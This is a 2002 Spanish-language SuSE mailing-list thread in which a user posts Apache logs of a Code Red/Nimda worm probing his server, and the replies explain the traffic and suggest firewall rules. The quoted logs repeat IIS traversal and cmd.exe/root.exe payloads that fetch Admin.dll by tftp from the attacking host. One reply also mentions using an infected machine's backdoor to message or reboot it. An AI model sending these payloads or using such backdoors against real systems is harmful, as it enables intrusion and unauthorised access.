Lo primero daros a todos las gracias, pues hace unas semanas hice una consulta para poder poner a funcionar mi servidor apache, y entre las respuestas de unos y otros pude hacer funcionar el servidor. Ahora mi nueva consulta, ¿como puedo controlar on-line kien esta accediendo a mi servidor? y la segunda y mas compreja ¿como me desago de esto? Entiendo ke es alguien ke esta tratando de colarme un troyano. Os dejo como muestra su ultimo intento. Por cierto Uso Suse Linux 7.3 personal y como http Apache 1.3.20. Gracias de antemano.
80.26.6.67 - - [29/Mar/2002:13:21:50 +0100] "GET /scripts/root.exe?/c+tftp%20-i%2080.26.6.67%20GET%20Admin.dll%20Admin.dll HTTP/1.0" 200 4 80.26.6.67 - - [29/Mar/2002:13:21:51 +0100] "GET /scripts/Admin.dll HTTP/1.0" 404 281 80.26.6.67 - - [29/Mar/2002:13:21:51 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 200 4 80.26.6.67 - - [29/Mar/2002:13:21:52 +0100] "GET /MSADC/root.exe?/c+tftp%20-i%2080.26.6.67%20GET%20Admin.dll%20Admin.dll HTTP/1.0" 200 4 80.26.6.67 - - [29/Mar/2002:13:21:52 +0100] "GET /MSADC/Admin.dll HTTP/1.0" 404 279 80.26.6.67 - - [29/Mar/2002:13:21:53 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 4 80.26.6.67 - - [29/Mar/2002:13:21:53 +0100] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%2080.26.6.67%20GET%20Admin.dll%20c:\Ad min.dll HTTP/1.0" 200 4 80.26.6.67 - - [29/Mar/2002:13:21:53 +0100] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%2080.26.6.67%20GET%20Admin.dll%20d:\Ad min.dll HTTP/1.0" 200 4 80.26.6.67 - - [29/Mar/2002:13:21:54 +0100] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%2080.26.6.67%20GET%20Admin.dll%20e:\Ad min.dll HTTP/1.0" 200 4 80.26.6.67 - - [29/Mar/2002:13:21:54 +0100] "GET /c/Admin.dll HTTP/1.0" 404 275 80.26.6.67 - - [29/Mar/2002:13:21:55 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 4 80.26.6.67 - - [29/Mar/2002:13:21:55 +0100] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%2080.26.6.67%20GET%20Admin.dll%20c:\Ad min.dll HTTP/1.0" 200 4 80.26.6.67 - - [29/Mar/2002:13:21:55 +0100] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%2080.26.6.67%20GET%20Admin.dll%20d:\Ad min.dll HTTP/1.0" 200 4 80.26.6.67 - - [29/Mar/2002:13:21:56 +0100] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%2080.26.6.67%20GET%20Admin.dll%20e:\Ad min.dll HTTP/1.0" 200 4 80.26.6.67 - - [29/Mar/2002:13:21:56 +0100] "GET /d/Admin.dll HTTP/1.0" 404 275 80.26.6.67 - - [29/Mar/2002:13:21:57 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 80.26.6.67 - - [29/Mar/2002:13:21:57 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319 80.26.6.67 - - [29/Mar/2002:13:21:58 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319 80.26.6.67 - - [29/Mar/2002:13:21:58 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sys tem32/cmd.exe?/c+dir HTTP/1.0" 404 335 80.26.6.67 - - [29/Mar/2002:13:21:58 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301 80.26.6.67 - - [29/Mar/2002:13:21:59 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301 80.26.6.67 - - [29/Mar/2002:13:21:59 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301 80.26.6.67 - - [29/Mar/2002:13:22:00 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301 80.26.6.67 - - [29/Mar/2002:13:22:00 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 285 80.26.6.67 - - [29/Mar/2002:13:22:00 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 285 80.26.6.67 - - [29/Mar/2002:13:22:01 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 80.26.6.67 - - [29/Mar/2002:13:22:01 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
Esto en realidad no es un troyano, es un atque de CodeRed el famoso virus que infecta la maquinas corriendo NT y las obliga a que en forma automatica traten de infectar a maquinas que esten en su misma subred o redes adyacentes. Una forma es generar reglas con ipchains o iptables... Saludos Alejandro -----Mensaje original----- De: antonio@suse.com [mailto:antonio@suse.com]En nombre de Antonio mudarra Aguado Enviado el: domingo, 31 de marzo de 2002 13:40 Para: suse-linux-s@suse.com Asunto: [suse-linux-s] Algo ke me trae de Cabeza. Lo primero daros a todos las gracias, pues hace unas semanas hice una consulta para poder poner a funcionar mi servidor apache, y entre las respuestas de unos y otros pude hacer funcionar el servidor. Ahora mi nueva consulta, ¿como puedo controlar on-line kien esta accediendo a mi servidor? y la segunda y mas compreja ¿como me desago de esto? Entiendo ke es alguien ke esta tratando de colarme un troyano. Os dejo como muestra su ultimo intento. Por cierto Uso Suse Linux 7.3 personal y como http Apache 1.3.20. Gracias de antemano.
80.26.6.67 - - [29/Mar/2002:13:21:50 +0100] "GET /scripts/root.exe?/c+tftp%20-i%2080.26.6.67%20GET%20Admin.dll%20Admin.dll HTTP/1.0" 200 4 80.26.6.67 - - [29/Mar/2002:13:21:51 +0100] "GET /scripts/Admin.dll HTTP/1.0" 404 281 80.26.6.67 - - [29/Mar/2002:13:21:51 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 200 4 80.26.6.67 - - [29/Mar/2002:13:21:52 +0100] "GET /MSADC/root.exe?/c+tftp%20-i%2080.26.6.67%20GET%20Admin.dll%20Admin.dll HTTP/1.0" 200 4 80.26.6.67 - - [29/Mar/2002:13:21:52 +0100] "GET /MSADC/Admin.dll HTTP/1.0" 404 279 80.26.6.67 - - [29/Mar/2002:13:21:53 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 4 80.26.6.67 - - [29/Mar/2002:13:21:53 +0100] "GET
/c/winnt/system32/cmd.exe?/c+tftp%20-i%2080.26.6.67%20GET%20Admin.dll%20c:\A d
min.dll HTTP/1.0" 200 4 80.26.6.67 - - [29/Mar/2002:13:21:53 +0100] "GET
/c/winnt/system32/cmd.exe?/c+tftp%20-i%2080.26.6.67%20GET%20Admin.dll%20d:\A d
min.dll HTTP/1.0" 200 4 80.26.6.67 - - [29/Mar/2002:13:21:54 +0100] "GET
/c/winnt/system32/cmd.exe?/c+tftp%20-i%2080.26.6.67%20GET%20Admin.dll%20e:\A d
min.dll HTTP/1.0" 200 4 80.26.6.67 - - [29/Mar/2002:13:21:54 +0100] "GET /c/Admin.dll HTTP/1.0" 404 275 80.26.6.67 - - [29/Mar/2002:13:21:55 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 4 80.26.6.67 - - [29/Mar/2002:13:21:55 +0100] "GET
/d/winnt/system32/cmd.exe?/c+tftp%20-i%2080.26.6.67%20GET%20Admin.dll%20c:\A d
min.dll HTTP/1.0" 200 4 80.26.6.67 - - [29/Mar/2002:13:21:55 +0100] "GET
/d/winnt/system32/cmd.exe?/c+tftp%20-i%2080.26.6.67%20GET%20Admin.dll%20d:\A d
min.dll HTTP/1.0" 200 4 80.26.6.67 - - [29/Mar/2002:13:21:56 +0100] "GET
/d/winnt/system32/cmd.exe?/c+tftp%20-i%2080.26.6.67%20GET%20Admin.dll%20e:\A d
min.dll HTTP/1.0" 200 4 80.26.6.67 - - [29/Mar/2002:13:21:56 +0100] "GET /d/Admin.dll HTTP/1.0" 404 275 80.26.6.67 - - [29/Mar/2002:13:21:57 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 80.26.6.67 - - [29/Mar/2002:13:21:57 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319 80.26.6.67 - - [29/Mar/2002:13:21:58 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319 80.26.6.67 - - [29/Mar/2002:13:21:58 +0100] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy s
tem32/cmd.exe?/c+dir HTTP/1.0" 404 335 80.26.6.67 - - [29/Mar/2002:13:21:58 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301 80.26.6.67 - - [29/Mar/2002:13:21:59 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301 80.26.6.67 - - [29/Mar/2002:13:21:59 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301 80.26.6.67 - - [29/Mar/2002:13:22:00 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301 80.26.6.67 - - [29/Mar/2002:13:22:00 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 285 80.26.6.67 - - [29/Mar/2002:13:22:00 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 285 80.26.6.67 - - [29/Mar/2002:13:22:01 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 80.26.6.67 - - [29/Mar/2002:13:22:01 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
-- Para dar de baja la suscripción, mande un mensaje a: suse-linux-s-unsubscribe@suse.com Para obtener el resto de direcciones-comando, mande un mensaje a: suse-linux-s-help@suse.com
El Sun, 31 Mar 2002 20:39:53 +0200 Antonio mudarra Aguado <amudarra@teleline.es> escribio:
Ahora mi nueva consulta, ¿como puedo controlar on-line kien esta accediendo a mi servidor?
A que te referis con "controlar"? Saber quien (que persona) esta accediendo a que url en que momento? La herramienta mas clara de la cual dispones son los logs que te deja el apache en /var/log/httpd, ahi ves que IP obtuvo que URL. Si la el directorio accedido pide usuario y clave, entonces te aparecera en la linea del log identificando a la persona. Podes armarte una pagina que tire un "tail" del /var/log/httpd/access_log para saber quienes accedieron a las ultimas URLs, si queres, o podes colocarte algun analizador de logs que te va a sacar estadisticas diarias
y la segunda y mas compreja ¿como me desago de esto? Entiendo ke es alguien ke esta tratando de colarme un troyano. Os dejo como muestra su ultimo intento. Por cierto Uso Suse Linux 7.3 personal y como http Apache 1.3.20.
80.26.6.67 - - [29/Mar/2002:13:21:50 +0100] "GET /scripts/root.exe?/c+tftp%20-i%2080.26.6.67%20GET%20Admin.dll%20Admin .dll HTTP/1.0" 200 4
Esas IPs que te estan tirando esas URLs estan infectados con Nimda o Code Red. Podes colocar en el iptables/ipchains reglas para filtrarte lo que venga de esas IP (al tu maquina del todo o solo al puerto 80), podes intentar contactarte con quien tenga esa IP o quien administre ese rango de IPs para avisar que la IP esta infectada (via traceroute o ver si tiene esa IP una pagina web con direccion de contacto), o cosas por el estilo. No avalo este tipo de medidas, pero con el CodeRed II una cosa que se difundio en su momento era, via parametros al root.exe que esta en /script (que es en realidad el cmd.exe de windows nt/2000) levantar al explorer/notepad/loquesea para avisar al administrador de la maquina que esta infectado y como limpiarlo, o incluso reiniciar el servidor o detenerlo. Si esta infectado con nimda simplemente (te podias infectar si tenias codered o el bug de unicode, y este ultimo no presentaba el root.exe) no tenias esa "puerta" trivial para avisar al administrador que estabas infectado y tenias que caer en las otras medidas. Saludos Gustavo
participants (3)
-
Alejandro Navarro -
Antonio mudarra Aguado -
Gustavo Muslera